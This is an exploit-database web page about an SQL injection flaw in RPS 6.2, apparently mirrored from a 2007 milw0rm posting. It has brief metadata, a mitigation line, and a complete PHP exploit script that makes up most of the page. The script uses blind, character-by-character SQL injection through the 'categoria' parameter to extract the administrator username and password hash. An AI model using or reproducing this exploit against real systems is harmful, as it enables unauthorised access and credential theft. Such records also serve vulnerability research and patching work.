Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
RPS 6.2 SQL Injection Exploit - exploit.company
header-logo
Suggest Exploit
vendor:
RPS
by:
s0cratex
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RPS
Affected Version From: 6.2
Affected Version To: 6.2
Patch Exists: NO
Related CWE:
CPE: a:rps_project:rps:6.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

RPS 6.2 SQL Injection Exploit

This exploit allows an attacker to retrieve the username and password from the RPS 6.2 system using SQL injection.

Mitigation:

To mitigate this vulnerability, ensure that the magic_quotes_gpc setting is turned on and implement proper input validation and parameterized queries.
Source

Exploit-DB raw data:

<?
//RPS 6.2 SQL Injection Exploit
//http://www.rps-project.com/

//Need magic_quotes_gpc = Off;
//by s0cratex
//Contact: s0cratex[at]hotmail[dot]com

//Salu2: rgod, 0pt1x 'n mechas.

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$host = "localhost"; $path="/rps"; $id=1;

echo "RPS 6.2 SQL Injection exploit\n-----------------------------\n\n";
echo "Username: ";
$j=1;$result="";
while(!strstr($result,chr(0))){
for($x=0;$x<255;$x++){
$cnx = fsockopen($host,80);
fwrite($cnx, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$x."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx)){ if(ereg("Descargar", fgets($cnx))){ $result .= chr($x);
echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
echo "Password: ";
$a=1;$result2="";
while(!strstr($result2,chr(0))){
for($i=0;$i<255;$i++){
$cnx2 = fsockopen($host,80);
fwrite($cnx2, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,".$a.",1))=".$i."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx2)){ if(ereg("Descargar", fgets($cnx2))){ $result2 .=
chr($i); echo chr($i); break; } }
fclose($cnx2);
if ($i==255) {
die("\n Try again...");
}
}
$a++;
}
echo "\nThe password has been encrypted with crypt() function...\n-----------------------------\n  by s0cratex";
?>

# milw0rm.com [2007-03-04]

Navigation

Suggest Exploit

Services By CQR